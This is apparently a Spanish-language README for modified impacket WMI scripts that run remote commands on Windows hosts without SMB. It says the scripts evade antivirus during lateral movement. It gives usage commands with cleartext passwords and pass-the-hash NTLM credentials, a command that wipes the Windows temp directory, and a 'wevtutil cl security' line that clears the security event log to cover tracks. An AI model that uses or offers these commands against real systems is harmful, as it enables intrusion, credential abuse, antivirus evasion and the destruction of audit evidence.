
Versión modificada de impacket wmiexec.py, obtiene salida (data, response) del registro, no necesita conexión SMB, y además evade el software antivirus en movimiento lateral como WMIHACKER.
Versión modificada de impacket wmiexec.py, wmipersist.py. Obtiene la salida (datos, respuesta) del registro, no necesita conexión SMB, pero estoy en el mal código :(
En el wmiexec.py original, obtiene respuesta de la conexión SMB (puerto 445, 139). Desafortunadamente, algunos antivirus monitorean estos puertos como de alto riesgo. En este caso, elimino la función de conexión SMB y uso otros métodos para ejecutar comandos.
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\Configuration
Name: EnableAt
Type: REG_DWORD
Value: 1
wmipersist-wip.py (Altamente recomendado, ¡¡¡solo funciona en impacket v0.9.24!!!): Una versión Python de WMIHACKER, de la cual tomé la plantilla VBS. Un atacante puede usarlo para movimientos laterales de manera segura bajo un antivirus en ejecución.
wmiexec-regOut.py: Solo un ejemplo simple del método Win32_Process.create.
Paso 1:
Paso 2:
Paso 3:
Paso 4:
Paso 5:
Paso 1:
Paso 2:
Paso 3:
Generalmente, solo necesitas instalar impacket oficial.
Con contraseña en texto claro
python3 wmiexec-reg.py administrator:[email protected] 'whoami'

Con hashes NTLM
python3 wmiexec-reg.py -hashes e91d2eafde47de62c6c49a012b3a6af1:e91d2eafde47de62c6c49a012b3a6af1 [email protected] 'whoami'

Con contraseña en texto claro (sin salida)
python3 wmipersist-wip.py administrator:[email protected] 'command'

Con hashes NTLM
python3 wmipersist-wip.py -hashes e91d2eafde47de62c6c49a012b3a6af1:e91d2eafde47de62c6c49a012b3a6af1 [email protected] 'whoami'
No olvides limpiar el directorio temporal después de ejecutar comandos con salida.
Comando: del /q /f /s C:\windows\temp\*

Comando que incluye comillas dobles.
Pon comillas dobles dentro de comillas simples wevtutil cl '"security"'


Con salida
python3 wmipersist-wip.py administrator:[email protected] "whoami /priv" -with-output
python3 wmipersist-wip.py [email protected] "whoami /priv" -hashes e91d2eafde47de62c6c49a012b3a6af1:e91d2eafde47de62c6c49a012b3a6af1 -with-output

Bajo el antivirus Huorong (¡¡Usando la plantilla VBS de WMIHACKER!!!)
